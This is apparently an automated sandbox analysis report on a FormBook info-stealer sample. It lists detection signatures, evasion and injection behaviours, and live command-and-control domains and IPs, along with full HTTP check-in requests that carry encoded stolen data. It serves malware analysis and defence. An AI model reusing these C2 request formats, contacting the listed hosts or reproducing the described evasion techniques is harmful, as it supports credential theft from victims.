Windows Analysis Report
PO#001498.exe

Overview

General Information

Sample name: PO#001498.exe
Analysis ID: 1524045
MD5: eae93786c2728add0bef6611bd278abb
SHA1: 8f8a60a7c31f5f5ba1bec5e91da0244dc7bba10c
SHA256: 869593545d30c7f8e2ec6b4676f6866afc6f6e7b56b769d289d84626f7578d98
Tags: exeuser-TeamDreier
Infos:

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Contains functionality to detect sleep reduction / modifications
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE file contains an invalid checksum
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

AV Detection

barindex
Source: PO#001498.exe ReversingLabs: Detection: 50%
Source: Yara match File source: 8.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000C.00000002.3133057378.0000000004970000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.1776540328.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.3132858119.0000000004920000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.1776852488.0000000003590000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.3133096714.0000000002E90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.3132094860.00000000044C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.3120123793.0000000002CB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.1777534454.0000000005050000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: PO#001498.exe Joe Sandbox ML: detected
Source: PO#001498.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: Binary string: forfiles.pdb source: svchost.exe, 00000008.00000003.1742969007.0000000003224000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1742956316.000000000321A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1742907274.000000000321B000.00000004.00000020.00020000.00000000.sdmp, AnbtBVreItY.exe, 0000000B.00000002.3124009966.0000000001398000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: forfiles.pdbGCTL source: svchost.exe, 00000008.00000003.1742969007.0000000003224000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1742956316.000000000321A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1742907274.000000000321B000.00000004.00000020.00020000.00000000.sdmp, AnbtBVreItY.exe, 0000000B.00000002.3124009966.0000000001398000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: AnbtBVreItY.exe, 0000000B.00000000.1697791921.000000000098E000.00000002.00000001.01000000.00000005.sdmp, AnbtBVreItY.exe, 0000000E.00000000.1842122598.000000000098E000.00000002.00000001.01000000.00000005.sdmp
Source: Binary string: wntdll.pdbUGP source: PO#001498.exe, 00000000.00000003.1308560731.0000000004850000.00000004.00001000.00020000.00000000.sdmp, PO#001498.exe, 00000000.00000003.1305915551.00000000046B0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1681555136.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1683279079.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.1776929290.000000000399E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.1776929290.0000000003800000.00000040.00001000.00020000.00000000.sdmp, forfiles.exe, 0000000C.00000003.1778969932.00000000049D2000.00000004.00000020.00020000.00000000.sdmp, forfiles.exe, 0000000C.00000002.3135104175.0000000004D1E000.00000040.00001000.00020000.00000000.sdmp, forfiles.exe, 0000000C.00000002.3135104175.0000000004B80000.00000040.00001000.00020000.00000000.sdmp, forfiles.exe, 0000000C.00000003.1776788198.0000000004827000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: PO#001498.exe, 00000000.00000003.1308560731.0000000004850000.00000004.00001000.00020000.00000000.sdmp, PO#001498.exe, 00000000.00000003.1305915551.00000000046B0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000008.00000003.1681555136.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1683279079.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.1776929290.000000000399E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.1776929290.0000000003800000.00000040.00001000.00020000.00000000.sdmp, forfiles.exe, forfiles.exe, 0000000C.00000003.1778969932.00000000049D2000.00000004.00000020.00020000.00000000.sdmp, forfiles.exe, 0000000C.00000002.3135104175.0000000004D1E000.00000040.00001000.00020000.00000000.sdmp, forfiles.exe, 0000000C.00000002.3135104175.0000000004B80000.00000040.00001000.00020000.00000000.sdmp, forfiles.exe, 0000000C.00000003.1776788198.0000000004827000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: svchost.pdb source: forfiles.exe, 0000000C.00000002.3122100683.0000000002F35000.00000004.00000020.00020000.00000000.sdmp, forfiles.exe, 0000000C.00000002.3136018758.00000000051AC000.00000004.10000000.00040000.00000000.sdmp, AnbtBVreItY.exe, 0000000E.00000000.1842704933.00000000033CC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.2070941487.000000003391C000.00000004.80000000.00040000.00000000.sdmp
Source: Binary string: svchost.pdbUGP source: forfiles.exe, 0000000C.00000002.3122100683.0000000002F35000.00000004.00000020.00020000.00000000.sdmp, forfiles.exe, 0000000C.00000002.3136018758.00000000051AC000.00000004.10000000.00040000.00000000.sdmp, AnbtBVreItY.exe, 0000000E.00000000.1842704933.00000000033CC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.2070941487.000000003391C000.00000004.80000000.00040000.00000000.sdmp
Source: C:\Users\user\Desktop\PO#001498.exe Code function: 0_2_00452126 FindFirstFileW,Sleep,FindNextFileW,FindClose, 0_2_00452126
Source: C:\Users\user\Desktop\PO#001498.exe Code function: 0_2_0045C999 FindFirstFileW,FindNextFileW,FindClose, 0_2_0045C999
Source: C:\Users\user\Desktop\PO#001498.exe Code function: 0_2_00436ADE GetFileAttributesW,FindFirstFileW,FindClose, 0_2_00436ADE
Source: C:\Users\user\Desktop\PO#001498.exe Code function: 0_2_00434BEE FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_00434BEE
Source: C:\Users\user\Desktop\PO#001498.exe Code function: 0_2_0045DD7C FindFirstFileW,FindClose, 0_2_0045DD7C
Source: C:\Users\user\Desktop\PO#001498.exe Code function: 0_2_0044BD29 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose, 0_2_0044BD29
Source: C:\Users\user\Desktop\PO#001498.exe Code function: 0_2_00436D2D FindFirstFileW,CreateFileW,SetFileTime,CloseHandle,SetFileTime,CloseHandle, 0_2_00436D2D
Source: C:\Users\user\Desktop\PO#001498.exe Code function: 0_2_00442E1F SetCurrentDirectoryW,FindFirstFileW,SetCurrentDirectoryW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_00442E1F
Source: C:\Users\user\Desktop\PO#001498.exe Code function: 0_2_00475FE5 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, 0_2_00475FE5
Source: C:\Users\user\Desktop\PO#001498.exe Code function: 0_2_0044BF8D _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose, 0_2_0044BF8D
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 12_2_02CCC600 FindFirstFileW,FindNextFileW,FindClose, 12_2_02CCC600
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 4x nop then xor eax, eax 12_2_02CB9BE0
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 4x nop then mov ebx, 00000004h 12_2_04A704DE

Networking

barindex
Source: Network traffic Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.7:49718 -> 67.223.117.169:80
Source: Network traffic Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.7:49705 -> 84.32.84.32:80
Source: Network traffic Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.7:49722 -> 154.9.228.56:80
Source: Network traffic Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.7:49714 -> 37.9.175.163:80
Source: Network traffic Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.7:49726 -> 203.161.41.205:80
Source: Network traffic Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.7:49738 -> 5.39.10.93:80
Source: Network traffic Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.7:49710 -> 199.59.243.227:80
Source: Network traffic Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.7:49730 -> 3.33.130.190:80
Source: Network traffic Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.7:49734 -> 162.240.81.18:80
Source: DNS query: www.paysom.xyz
Source: Joe Sandbox View IP Address: 162.240.81.18 162.240.81.18
Source: Joe Sandbox View IP Address: 199.59.243.227 199.59.243.227
Source: Joe Sandbox View IP Address: 199.59.243.227 199.59.243.227
Source: Joe Sandbox View ASN Name: UNIFIEDLAYER-AS-1US UNIFIEDLAYER-AS-1US
Source: Joe Sandbox View ASN Name: VIMRO-AS15189US VIMRO-AS15189US
Source: Joe Sandbox View ASN Name: GBTCLOUDUS GBTCLOUDUS
Source: Joe Sandbox View ASN Name: WEBSUPPORT-SRO-SK-ASSK WEBSUPPORT-SRO-SK-ASSK
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\PO#001498.exe Code function: 0_2_0044289D InternetQueryDataAvailable,InternetReadFile, 0_2_0044289D
Source: global traffic HTTP traffic detected: GET /v1m8/?PDnL0H4=uHJ964Jak9lb4YUyfkZQ2xvbBZ+v0uNjDgaNEBQRc8PC25V4G9pb67rGeGfWlSNDdRliNlGk0Q64b1Xgz3nZ+6SvJiIFcUn42OZbRWP1Dzd7lzveO4xPaRnMofxiLb4gmwdLcuxD1TDA&cJ=eZx4P HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Host: www.ankittrading.storeConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/6.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.3)
Source: global traffic HTTP traffic detected: GET /l4rw/?PDnL0H4=bxLhvRGrGkmA3a8MVLksA9O6epMWunBjiiDhmPdAbaxOp/M+Gpk9AJyEIFaWZbfbYSMKIIsbQIm0wGAdIoyiMtPXYWC6E+UHTloZARVqKBbmWVLZ91Lo1Le8qgLpq0Xpt4sX3vyn3hlR&cJ=eZx4P HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Host: www.notepad.mobiConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/6.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.3)
Source: global traffic HTTP traffic detected: GET /t3gh/?PDnL0H4=zEDKAPo0fWIr7gepujFM3hONZ8pGlKAcECMHT5GhOUjPLGGHYOnRhJ5losn3B+cwv2wWXqsOX+tmwA3DpzxQYWcvF9OI/7vzh1sU1BgJQgDKmJ3P14tuMLY//UhfsPslfp/YvJbN0ZLZ&cJ=eZx4P HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Host: www.elektromontaze.onlineConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/6.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.3)
Source: global traffic HTTP traffic detected: GET /zctj/?PDnL0H4=7S4o5+ZCgT4OODwfFpG+s4wiCFAnOZCzfRxqRVdrbobbRD+6SGggBBocUcamamM0rj3t2K/sItShBC5e9jOvPMFc8Ts9kNN+wHKhjSFFlD0pLjr7njpBm/yeBJ+c4s7d7sPpMprzB4Pv&cJ=eZx4P HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Host: www.rtpsilva4d.clickConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/6.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.3)
Source: global traffic HTTP traffic detected: GET /kyiu/?PDnL0H4=WCaTEpVIV1F/IDd5xet0U/v8EBgR4+MrBcMWAOPreHJieMqZHDOJq6LkbwJNcnm0/KUex7YRpxZmHiJXClvi8IQXQojzYPwJ0us3fopYznmqkr1xoIt7ztcwmZJFiE0pdwe7fNqg6tit&cJ=eZx4P HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Host: www.mcse.topConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/6.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.3)
Source: global traffic HTTP traffic detected: GET /guro/?PDnL0H4=7+kD9FiWdLQbO7Xh4mp3Tzq63KAmHikwKr+gs46wKWEdWXZTCgAq3DZWNFT071I6kRcf0adkrwgUpAlbIxvs7ctY0Q4kDRV1VLfOJzsmQYQkjGZNIcuY5VcZwoAGjmNzsmH6ta/2x1bG&cJ=eZx4P HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Host: www.paysom.xyzConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/6.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.3)
Source: global traffic HTTP traffic detected: GET /swj2/?PDnL0H4=P0crsamxtuU6gq442A5JVDLtFaQ272SuKPgrEa6KpDZhy5jCC+7AJhWiOHv/kCv6EaT0CLlKbyEmlyMFHr9gqySJu+UUyj4X55F7OWVcwUUW7TkNkiV3TddgPHJr/SBxtLqf2BhyIm+8&cJ=eZx4P HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Host: www.bearableguy.netConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/6.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.3)
Source: global traffic HTTP traffic detected: GET /l90v/?PDnL0H4=tj7s0oyrGc1LrDSGnf8YHtw+ebsKDrOBu6GSmYGqVaA9KTCtf5t4TDr3lhx61sWDy3u5CDLnPKwXwDtlkJUkQXT0jCihCdlrSRGn+EUQa4fXC4BrJZGRQFbKceI3GDyLA2ga/kBrekJs&cJ=eZx4P HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Host: www.monitoraseg.onlineConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/6.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.3)
Source: global traffic HTTP traffic detected: GET /mfnh/?cJ=eZx4P&PDnL0H4=uiQSy69x68ywNzcc2xGZGS3b7G9Di2AmSZy7E0+wXNrf1UQY7cg94CWp6P5m0cawB8S+TLOh4cYPJlBKxEA2O4b/zKyvUiD5czmdoxMYCqiElO0H9mCQ9xUwX3LJfG6F/jT3KbKUs5js HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Host: www.spectre.centerConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/6.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.3)
Source: global traffic DNS traffic detected: DNS query: www.ankittrading.store
Source: global traffic DNS traffic detected: DNS query: www.notepad.mobi
Source: global traffic DNS traffic detected: DNS query: www.elektromontaze.online
Source: global traffic DNS traffic detected: DNS query: www.rtpsilva4d.click
Source: global traffic DNS traffic detected: DNS query: www.mcse.top
Source: global traffic DNS traffic detected: DNS query: www.paysom.xyz
Source: global traffic DNS traffic detected: DNS query: www.bearableguy.net
Source: global traffic DNS traffic detected: DNS query: www.monitoraseg.online
Source: global traffic DNS traffic detected: DNS query: www.spectre.center
Source: unknown HTTP traffic detected: POST /l4rw/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.5Host: www.notepad.mobiOrigin: http://www.notepad.mobiReferer: http://www.notepad.mobi/l4rw/Cache-Control: max-age=0Connection: closeContent-Length: 220Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/6.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.3)Data Raw: 50 44 6e 4c 30 48 34 3d 57 7a 6a 42 73 6d 61 2b 4e 6b 65 68 71 6f 35 76 66 4b 38 38 47 63 79 46 50 2b 38 38 67 6c 6f 56 6b 77 7a 52 72 38 31 38 58 59 39 35 73 66 41 53 4c 49 45 53 43 4f 4f 79 46 33 65 41 63 6f 72 62 41 53 41 36 43 50 51 43 43 62 43 35 33 43 59 2b 4a 75 62 73 44 2b 6e 49 52 77 75 4d 48 4f 30 46 50 30 6b 69 42 52 39 47 48 78 6e 56 5a 79 53 59 79 48 43 44 67 65 48 37 67 56 37 5a 34 6d 43 65 79 37 51 41 76 76 65 74 70 68 6f 78 77 6d 2b 5a 6a 67 66 44 72 32 79 4c 2b 64 32 77 59 70 33 50 6b 50 4c 30 6c 43 43 34 6f 65 6a 56 32 31 56 4f 6e 50 46 47 51 38 63 35 6b 4a 69 38 6a 64 76 73 45 53 72 77 41 45 4f 39 2f 66 74 6c 77 57 65 38 33 77 3d 3d Data Ascii: PDnL0H4=WzjBsma+Nkehqo5vfK88GcyFP+88gloVkwzRr818XY95sfASLIESCOOyF3eAcorbASA6CPQCCbC53CY+JubsD+nIRwuMHO0FP0kiBR9GHxnVZySYyHCDgeH7gV7Z4mCey7QAvvetphoxwm+ZjgfDr2yL+d2wYp3PkPL0lCC4oejV21VOnPFGQ8c5kJi8jdvsESrwAEO9/ftlwWe83w==
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 02 Oct 2024 13:17:02 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 02 Oct 2024 13:17:04 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 02 Oct 2024 13:17:07 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
